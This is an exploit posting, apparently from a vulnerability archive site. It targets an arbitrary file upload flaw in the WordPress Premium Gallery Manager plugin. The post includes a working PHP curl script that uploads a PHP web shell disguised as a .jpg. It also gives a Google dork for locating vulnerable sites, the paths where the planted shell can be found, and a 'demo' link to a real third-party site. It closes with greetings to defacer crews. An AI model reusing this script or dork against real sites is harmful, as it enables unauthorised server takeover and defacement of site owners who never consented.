WordPress Premium Gallery Manager Shell Upload

2014.03.07
Credit: eX-Sh1Ne
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

Wordpress Plugins Premium Gallery Manager Arbitrary File Upload ###################################################################################### # Author : eX-Sh1Ne # # Facebook : www.fb.me/ShiNe.gov # # Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager" # ####################################################################################### Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php Exploit : <?php $uploadfile="Sh1Ne.php.jpg"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/wp-content/plugins/Premium_Gallery_Manager/uploadify/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ------------------------------------------------------------------------------------- Shell Access : http://localhost/wp-content/plugins/Premium_Gallery_Manager/uploadify/Sh1Ne.php.jpg or http://localhost/wp-content/uploads/[years]/[month]/ << Find your shell ------------------------------------------------------------------------------------- Demo : http://hotelhofn.is/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php ------------------------------------------------------------------------------------- sh00tz : [+] Special Greetz for ViviHoney - Sanjungan Jiwa [+] Java Defacer Team - IDCA Team - No-Name Crew - IL-c0de - Bandung Blackhat [+] Admin07 - Freezer22 - Pr0blemNymouz - Black Style - FH04ZA - MS06-87 - hantu_j4va - Antonio HsH - Taqiyya [+] Mr. Xenophobic - Deflectoz - DeYuBi-Cyber - Mbah_Dukun - Mr./AryeaKoplaxz404 - Sanja07 - ice-cream - p0zh1e - [+] K4C3 Undetected \!/ INDONESIAN PEOPLE HERE \!/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top